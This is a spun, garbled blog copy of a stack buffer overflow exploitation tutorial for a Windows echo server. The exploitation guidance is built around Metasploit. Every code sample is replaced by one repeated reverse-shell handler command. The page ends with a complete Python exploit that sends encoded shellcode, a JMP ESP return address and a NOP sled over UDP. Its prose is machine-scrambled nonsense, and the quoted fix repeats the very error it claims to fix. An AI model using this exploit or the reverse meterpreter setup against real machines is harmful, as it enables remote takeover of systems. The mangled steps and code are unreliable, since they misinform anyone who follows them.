-->

Exploitation 1

Exploitation 1

Hello guys! I wanted to exercise a piffling guide on exploitation to consummate on what is teached on the class thence I assume y'all know the basics already,I promise y'all discovery it useful.

Target download: server.exe

Knowing our target

Ok thence nosotros receive got this plan called "server.exe" which nosotros receive got been told to audit,only thing nosotros know most it is that a this is custom application that is run on 1 of the our client servers,so let's run it ourselves as well as catch what it does.

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

Interesting,so let's conect to it using netcat

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

So it looks similar nosotros receive got a custom echo server,now why would anyone truly needs this? no 1 knows but this information should survive plenty to start amongst our actual audit.

Testing for overflows

Now nosotros are gonna drib our application into olly as well as leave of absence it listening as well as nosotros are gonna brand a python script that volition eventually overstep our exploit,but let's non acquire besides far ahead of ourselves :) starting fourth dimension nosotros postulate to cheque if at that spot is a vulnerability,so our initial script volition survive something similar this

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

It's really simple,we exercise a buffer amongst 200 A,now this could survive whatsoever missive of the alphabet it dosn't matter,we volition feed this buffer to our target application to travail as well as move into suspension as well as since olly is attached to it nosotros volition survive able to catch to a greater extent than or less interesting informaion,now let's exercise this!

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

Oooops! looks similar nosotros didn't hitting it difficult enough! So let's give it what it wants! We are forthwith going to purpose a bigger buffer H5N1 * 500

Now it volition crash as well as nosotros cheque Olly,

over.jpg

So this agency it tried to read 41414141 (AAAA inwards hex) equally it's side past times side teaching to execute (EIP)

there is a really proficient conduct chances nosotros tin command the execution catamenia as well as move into exercise whatever nosotros desire inwards the context of the user that the application is runing under(meaning that if it runs amongst admin priv nosotros pretty much owned the box,otherwise nosotros tin yet acquire a vanquish dorsum but amongst lower privileges).

Finding the offset

Next step,now nosotros postulate to discovery the offset this is the number of bytes nosotros postulate to achieve as well as overwrite the furnish address,the best trend to exercise this is using a metapsloit tool called patter_create.rb as well as pattern_offset.rb thence this tool is located inwards backtrack inwards the directory

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

We number this command

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

What nosotros acquire dorsum is a 500 byte string that nosotros volition forthwith feed into our target instead of the 500 H5N1 thence nosotros alter our buffer variable to this

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

And forthwith nosotros restart the server (ctrl+2 to restart as well as F9 to run it on Olly) as well as launch our script again,it volition crash,let's hold off at Olly

over2k.jpg

We volition receive got this value into the pattern_offset.rb tool as well as it volition give us our offset,easy enough? :)

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

Now lets bear witness this,we are gonna empty our buffer variable as well as this fourth dimension nosotros are gonna purpose A's 1 time again but instead of a random number nosotros volition survive using our offset as well as bear witness it,our buffer variable should forthwith hold off something similar this

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

Notice nosotros forthwith receive got B as well as C these are the house holders for our furnish address as well as shellcode,respectively,if all goes right forthwith nosotros should survive able to crash the target 1 time again as well as the value of EIP should survive 42424242 (BBBB inwards hex)

Getting a furnish address

What nosotros postulate forthwith is a furnish adress that volition brand the execution catamenia saltation into our shellcode,if y'all lookout olly amongst the finally crash as well as 'Follow inwards dump' the ESP register,you volition catch thats where just our C's start as well as scream upwards this is our placeholder for the shellcode but to acquire at that spot starting fourth dimension nosotros postulate an adress amongst a JMP ESP teaching or equivalent (call,pop ret) thence what nosotros tin exercise to discovery this adress is charge kernel32.dll (you tin also purpose user32.dll most of the fourth dimension as well as it has trend to a greater extent than adresses available) onto Olly or IDA as well as hold off for the teaching that way,or fifty-fifty ameliorate purpose a proper tool for the chore at that spot is 2 proficient tools for this, 1 is included amongst the metasploit framework the tool is called 'msfpescan'

The command to discovery a JMP ESP teaching amongst this tool is

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

There other tool is findjmp2 which y'all tin download here.

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

You should survive able to purpose whatsoever equally long equally it dosn't incorporate whatsoever zip characters (00) because that would suspension our exploit,remember a zip graphic symbol terminates a string.

Now nosotros are gonna bear witness this.

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

Let's overstep to olly as well as overstep to this retention location (ctrl+g) as well as set a breakpoint hither (F2),restart the server as well as launch our script,we should acre at the JMP ESP instruction.

over3.jpg

And if nosotros measuring inwards nosotros should catch our C's,now nosotros are educate to alter these for something useful!

Creating to a greater extent than or less shellcode

We are getting close,now nosotros merely postulate to supplant our shellcode placeholder for a existent one,I assume y'all already know what a shellcode is but small-scale recap here,basically is a slice of auto code that volition furnish us a vanquish or exercise anything nosotros desire similar adding a user on the system,you tin brand these past times mitt but I wont encompass that here,so no work metasploit to the rescue again! We are going to purpose the msfpayload as well as msfencode tools,issue this command:

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

Please notice y'all volition postulate to adjust the ip address to the 1 of your backtrack machine,so nosotros are telling msfpayload to exercise a opposite meterpreter shellcode for us amongst these parameters as well as and then nosotros pipage it throught msfencode which volition encode our shellcode mainly for 2 reasons,the most of import is getting rid of characters that would suspension our shellcode (the -b option) as well as getting past times to a greater extent than or less IDS.

Exploit time!

At this signal our concluding exploit should hold off something similar this:

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

Start a payload handler issuing this command:

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

And if everything went right y'all should acquire a session,finally the 2 primary problems y'all volition come across patch working on a exploit:bad furnish address,remember every SP as well as linguistic communication volition receive got unlike arrangement libs (user32,kernel32...) thence brand certain y'all acquire an address for the right windows version as well as language,and bad chars inwards the shellcode,I truly wanted to bash my caput against a wall thence many times amongst this one,so if everything industrial plant right until the signal of using existent shellcode this is the most in all probability case.

umm,there should survive plenty infinite for a meterpreter,anyway y'all powerfulness desire to travail amongst a simpler payload first,like executing calc.exe,if y'all follow along the execution amongst ollydbg as well as the solely work is the shellcode it powerfulness survive a encoding issue,also infinite but if I scream upwards right this is non the case.

calc.exe shellcode:

msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d' -e x86/shikata_ga_nai -t c

@@@@@@@@

t3rmlt I receive got tested your exploit as well as I noticed that subsequently the jmp esp y'all dont acre on the NOPs+shellcode,then paying closer attending to your code I noticed y'all missed the x on the nops

buf += '\x90' * 16

and the right is

buf += '\x90' * 16

after this alter your exploit industrial plant :)

this is how it should hold off when y'all saltation to esp...

##########
I lately started to dive into retention exploitation as well as worked through Stack BoF, SEH Stack BoF , Heap Spraying as well as Egg Hunter examples. If at that spot is an involvement I volition throw the full general exploitation procedure hither but I would receive got to get together to a greater extent than or less screenshots as well as images.



A few handy things I came across (source: corelan.be / youtube):


- Stack BoF Exploit Reliability -

Add a "Prepend" or "Stack Shift". Often used on windows exploits to brand room on the stack for the decoder to properly decode the payload / shellcode. Also prevents exploit becoming corrupted of whatsoever information on the stack.

Example:

prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add together esp, -1001h (4097)
prepend += "\x44" # inc esp

In instance you’re wondering why they use  -1001 as well as and then growth esp 1 time again to -1000, the opcode for add together esp,-1000 contains a zip byte.

Exploit volition hold off like: [enough junk to overwrite EIP][call esp addr][$prepend][iNT3][shellcode]

Create the right teaching past times using metasm inwards Metasploit. Example:
metasm > add together esp,-450
"\x81\xc4\x3e\xfe\xff\xff"


- What to exercise if infinite for a payload is limited? -

    Use a "staged" metasploit payload equally they require less space
    Use a unlike (or no) encoding of the payload
    Use an egg hunter (summary: payload tin survive located anywhere inwards memory, nosotros set a tag inwards forepart of it, on exploitation nosotros search for it inwards memory) Drawback: 100% CPU utilization, travail to purpose equally finally resort
    Use a negative jump: this solely industrial plant if nosotros receive got plenty infinite on the begin, for illustration a SEH BoF

Example:
We overwrite 4403 bytes earlier nosotros achieve the SEH handler. This infinite tin survive used to house our payload but nosotros must saltation dorsum to it. Some pseudo-code:


distance_to_seh = [value]  #e.g. 4403

eip = [poppopret] #an teaching from a target lib is preferred over OS lib

shellcode = [array of shellcode] #our payload

pad = "\x90" * (distance_to_seh - len(shellcode)) #adds NOPsled earlier payload

jmp_min = "\xE9\x98\xEF\xFF\xFF" #goes dorsum 4000 bytes to acre into the NOP sled



buf = pad + shellcode + struct.pack('<I', eip) + jmp_min #ready to xploit

That's all folks... Keep on learning  ^_^
#############
#! /usr/bin/env python
import socket
import sys

buf = buf = 'A' * 260
buf += '\x13\x44\x87\x7c' #user32.dll jmp XP SP3
buf += '\90' * 16
buf += (
"\xdb\xc5\xbe\x1b\xbf\x27\x38\xd9\x74\x24\xf4\x5f\x31\xc9\xb1"
"\x33\x31\x77\x17\x83\xef\xfc\x03\x6c\xac\xc5\xcd\x6e\x3a\x80"
"\x2e\x8e\xbb\xf3\xa7\x6b\x8a\x21\xd3\xf8\xbf\xf5\x97\xac\x33"
"\x7d\xf5\x44\xc7\xf3\xd2\x6b\x60\xb9\x04\x42\x71\x0f\x89\x08"
"\xb1\x11\x75\x52\xe6\xf1\x44\x9d\xfb\xf0\x81\xc3\xf4\xa1\x5a"
"\x88\xa7\x55\xee\xcc\x7b\x57\x20\x5b\xc3\x2f\x45\x9b\xb0\x85"
"\x44\xcb\x69\x91\x0f\xf3\x02\xfd\xaf\x02\xc6\x1d\x93\x4d\x63"
"\xd5\x67\x4c\xa5\x27\x87\x7f\x89\xe4\xb6\xb0\x04\xf4\xff\x76"
"\xf7\x83\x0b\x85\x8a\x93\xcf\xf4\x50\x11\xd2\x5e\x12\x81\x36"
"\x5f\xf7\x54\xbc\x53\xbc\x13\x9a\x77\x43\xf7\x90\x83\xc8\xf6"
"\x76\x02\x8a\xdc\x52\x4f\x48\x7c\xc2\x35\x3f\x81\x14\x91\xe0"
"\x27\x5e\x33\xf4\x5e\x3d\x59\x0b\xd2\x3b\x24\x0b\xec\x43\x06"
"\x64\xdd\xc8\xc9\xf3\xe2\x1a\xae\x0c\xa9\x07\x86\x84\x74\xd2"
"\x9b\xc8\x86\x08\xdf\xf4\x04\xb9\x9f\x02\x14\xc8\x9a\x4f\x92"
"\x20\xd6\xc0\x77\x47\x45\xe0\x5d\x24\x08\x72\x3d\x85\xaf\xf2"
"\xa4\xd9"
)

try:
    sc = socket.socket(socket.AF_INET,socket.SOCK_DGRAM) #udp socket
    sc.connect(("10.1.1.15", 1979))
    sc.send(buf + "\n")
    impress "[+] Evil buffer sent"
    sc.close()

except:
    impress "[-] Can't post evil buffer"
    sys.exit()

############

Blogger
Disqus
Pilih Sistem Komentar

No comments

Advertiser